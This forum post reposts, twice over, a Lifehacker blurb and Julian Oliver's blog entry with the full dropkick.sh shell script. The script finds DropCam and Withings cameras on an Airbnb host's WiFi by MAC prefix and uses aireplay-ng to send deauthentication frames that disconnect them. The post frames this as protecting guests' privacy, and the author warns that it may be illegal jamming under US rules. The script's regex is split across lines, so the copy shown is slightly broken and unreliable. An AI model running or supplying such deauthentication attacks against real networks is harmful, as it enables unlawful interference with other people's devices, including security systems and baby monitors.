Post by High Priestess on Jan 14, 2016 17:30:17 GMT
IN this article, a hacker tells AIrbnb guests how to disable their host's wifi-run surveillance cameras on the premises:
lifehacker.com/detect-and-disable-an-airbnbs-hidden-wi-fi-cameras-with-1752817084
Airbnb renters keep finding hidden Wi-Fi cameras watching them without them knowing. If you want to ensure your privacy in a rental, this shell script will find any Wi-Fi cameras on the network and disable them.
The rise in popularity of cheap cameras like Google’s Nest DropCam make it easier than ever for homeowners to install basic surveillance systems. And while Airbnb suggests that hosts respect their guests’ privacy, they don’t explicitly say that hosts can’t have video or audio surveillance equipment installed and monitoring guests. This understandably bothers a lot of people who expect privacy in a rental they’re paying for. Fortunately, engineer and software developer Julian Oliver came up with a simple script to knock those types of cameras offline. Once you connect to the Airbnb’s Wi-Fi, a quick run of Oliver’s dropkick.sh script will find and disconnect the Wi-Fi enabled cameras on the network and give you some privacy.
Before you make the decision to use the script, however, Oliver explains that it may be illegal to run due to changes made by the FCC last year. So use the script at your own risk. You can find the complete instructions and more information at the link below.
Link to page with info on how to disable cameras:
julianoliver.com/output/log_2015-12-18_14-39
Detect and disconnect WiFi cameras in that AirBnB you’re staying in
Published: Fri 18 December 2015
By Julian Oliver
In Log.
tags: Linux Networking Privacy
Context
There have been a few too many stories lately of AirBnB hosts caught spying on their guests with WiFi cameras, using DropCam cameras in particular. Here’s a quick script that will detect two popular brands of WiFi cameras during your stay and disconnect them in turn. It’s based on glasshole.sh. It should do away with the need to rummage around in other people’s stuff, racked with paranoia, looking for the things.
Thanks to Adam Harvey for giving me the push, not to mention for naming it.
For a plug-and-play solution in the form of a network appliance, see Cyborg Unplug.
dropkick.sh
See code comments for more info. You’re welcome.
1 #!/bin/bash
2 #
3 # DROPKICK.SH
4 #
5 # Detect and Disconnect the DropCam and Withings devices some people are using to
6 # spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh:
7 #
8 # julianoliver.com/output/log_2014-05-30_20-52
9 #
10 # This script was named by Adam Harvey (http://ahprojects.com), who also
11 # encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi,
12 # etc) and the aircrack-ng suite. I put 'beep' in there for a little audio
13 # notification. Comment it out if you don't need it.
14 #
15 # See also plugunplug.net, for a plug-and-play device that does this
16 # based on OpenWrt. Code here:
17 #
18 # github.com/JulianOliver/CyborgUnplug
19 #
20 # Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows:
21 #
22 # sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>
23
24 shopt -s nocasematch # Set shell to ignore case
25 shopt -s extglob # For non-interactive shell.
26
27 readonly NIC=$1 # Your wireless NIC
28 readonly BSSID=$2 # Network BSSID (AirBnB WiFi network)
29 readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
30 # MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not
31 # present.
32 readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings
33 readonly POLL=30 # Check every 30 seconds
34 readonly LOG=/var/log/dropkick.log
35
36 airmon-ng stop mon0 # Pull down any lingering monitor devices
37 airmon-ng start $NIC # Start a monitor device
38
39 while true;
40 do
41 for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
42 '([[:xdigit:]]{1,2}
{5}[[:xdigit:]]{1,2}')
43 do
44 if [[ "$TARGET" == "$GGMAC" ]]
45 then
46 # Audio alert
47 beep -f 1000 -l 500 -n 200 -r 2
48 echo "WiFi camera discovered: "$TARGET >> $LOG
49 aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
50 echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG
51 echo '
52 __ __ _ __ __
53 ___/ /______ ___ / /__ (_)___/ /_____ ___/ /
54 / _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ /
55 \_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/
56 /_/
57
58 '
59 else
60 echo $TARGET": is not a DropCam or Withings device. Leaving alone.."
61 fi
62 done
63 echo "None found this round."
64 sleep $POLL
65 done
66 airmon-ng stop mon0
Disclaimer
For the record, I’m well aware DropCam and Withings are also sold as baby monitors and home security products. The very fact this code exists should challenge you to reconsider the non-sane choice to rely on anything wireless for home security. More so, WiFi jammers - while illegal - are cheap. If you care, use cable.
It may be illegal to use this script in the US. Due to changes in FCC regulation in 2015, it appears intentionally de-authing WiFi clients, even in your own home, is now classed as ‘jamming’. Up until recently, jamming was defined as the indiscriminate addition of noise to signal - still the global technical definition. It’s worth noting here that all wireless routers necessarily ship with the ability to de-auth, as part of the 802.11 specification.
All said, use of this script is at your own risk. Use with caution.
lifehacker.com/detect-and-disable-an-airbnbs-hidden-wi-fi-cameras-with-1752817084
Airbnb renters keep finding hidden Wi-Fi cameras watching them without them knowing. If you want to ensure your privacy in a rental, this shell script will find any Wi-Fi cameras on the network and disable them.
The rise in popularity of cheap cameras like Google’s Nest DropCam make it easier than ever for homeowners to install basic surveillance systems. And while Airbnb suggests that hosts respect their guests’ privacy, they don’t explicitly say that hosts can’t have video or audio surveillance equipment installed and monitoring guests. This understandably bothers a lot of people who expect privacy in a rental they’re paying for. Fortunately, engineer and software developer Julian Oliver came up with a simple script to knock those types of cameras offline. Once you connect to the Airbnb’s Wi-Fi, a quick run of Oliver’s dropkick.sh script will find and disconnect the Wi-Fi enabled cameras on the network and give you some privacy.
Before you make the decision to use the script, however, Oliver explains that it may be illegal to run due to changes made by the FCC last year. So use the script at your own risk. You can find the complete instructions and more information at the link below.
Link to page with info on how to disable cameras:
julianoliver.com/output/log_2015-12-18_14-39
Detect and disconnect WiFi cameras in that AirBnB you’re staying in
Published: Fri 18 December 2015
By Julian Oliver
In Log.
tags: Linux Networking Privacy
Context
There have been a few too many stories lately of AirBnB hosts caught spying on their guests with WiFi cameras, using DropCam cameras in particular. Here’s a quick script that will detect two popular brands of WiFi cameras during your stay and disconnect them in turn. It’s based on glasshole.sh. It should do away with the need to rummage around in other people’s stuff, racked with paranoia, looking for the things.
Thanks to Adam Harvey for giving me the push, not to mention for naming it.
For a plug-and-play solution in the form of a network appliance, see Cyborg Unplug.
dropkick.sh
See code comments for more info. You’re welcome.
1 #!/bin/bash
2 #
3 # DROPKICK.SH
4 #
5 # Detect and Disconnect the DropCam and Withings devices some people are using to
6 # spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh:
7 #
8 # julianoliver.com/output/log_2014-05-30_20-52
9 #
10 # This script was named by Adam Harvey (http://ahprojects.com), who also
11 # encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi,
12 # etc) and the aircrack-ng suite. I put 'beep' in there for a little audio
13 # notification. Comment it out if you don't need it.
14 #
15 # See also plugunplug.net, for a plug-and-play device that does this
16 # based on OpenWrt. Code here:
17 #
18 # github.com/JulianOliver/CyborgUnplug
19 #
20 # Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows:
21 #
22 # sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>
23
24 shopt -s nocasematch # Set shell to ignore case
25 shopt -s extglob # For non-interactive shell.
26
27 readonly NIC=$1 # Your wireless NIC
28 readonly BSSID=$2 # Network BSSID (AirBnB WiFi network)
29 readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
30 # MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not
31 # present.
32 readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings
33 readonly POLL=30 # Check every 30 seconds
34 readonly LOG=/var/log/dropkick.log
35
36 airmon-ng stop mon0 # Pull down any lingering monitor devices
37 airmon-ng start $NIC # Start a monitor device
38
39 while true;
40 do
41 for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
42 '([[:xdigit:]]{1,2}
{5}[[:xdigit:]]{1,2}')43 do
44 if [[ "$TARGET" == "$GGMAC" ]]
45 then
46 # Audio alert
47 beep -f 1000 -l 500 -n 200 -r 2
48 echo "WiFi camera discovered: "$TARGET >> $LOG
49 aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
50 echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG
51 echo '
52 __ __ _ __ __
53 ___/ /______ ___ / /__ (_)___/ /_____ ___/ /
54 / _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ /
55 \_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/
56 /_/
57
58 '
59 else
60 echo $TARGET": is not a DropCam or Withings device. Leaving alone.."
61 fi
62 done
63 echo "None found this round."
64 sleep $POLL
65 done
66 airmon-ng stop mon0
Disclaimer
For the record, I’m well aware DropCam and Withings are also sold as baby monitors and home security products. The very fact this code exists should challenge you to reconsider the non-sane choice to rely on anything wireless for home security. More so, WiFi jammers - while illegal - are cheap. If you care, use cable.
It may be illegal to use this script in the US. Due to changes in FCC regulation in 2015, it appears intentionally de-authing WiFi clients, even in your own home, is now classed as ‘jamming’. Up until recently, jamming was defined as the indiscriminate addition of noise to signal - still the global technical definition. It’s worth noting here that all wireless routers necessarily ship with the ability to de-auth, as part of the 802.11 specification.
All said, use of this script is at your own risk. Use with caution.
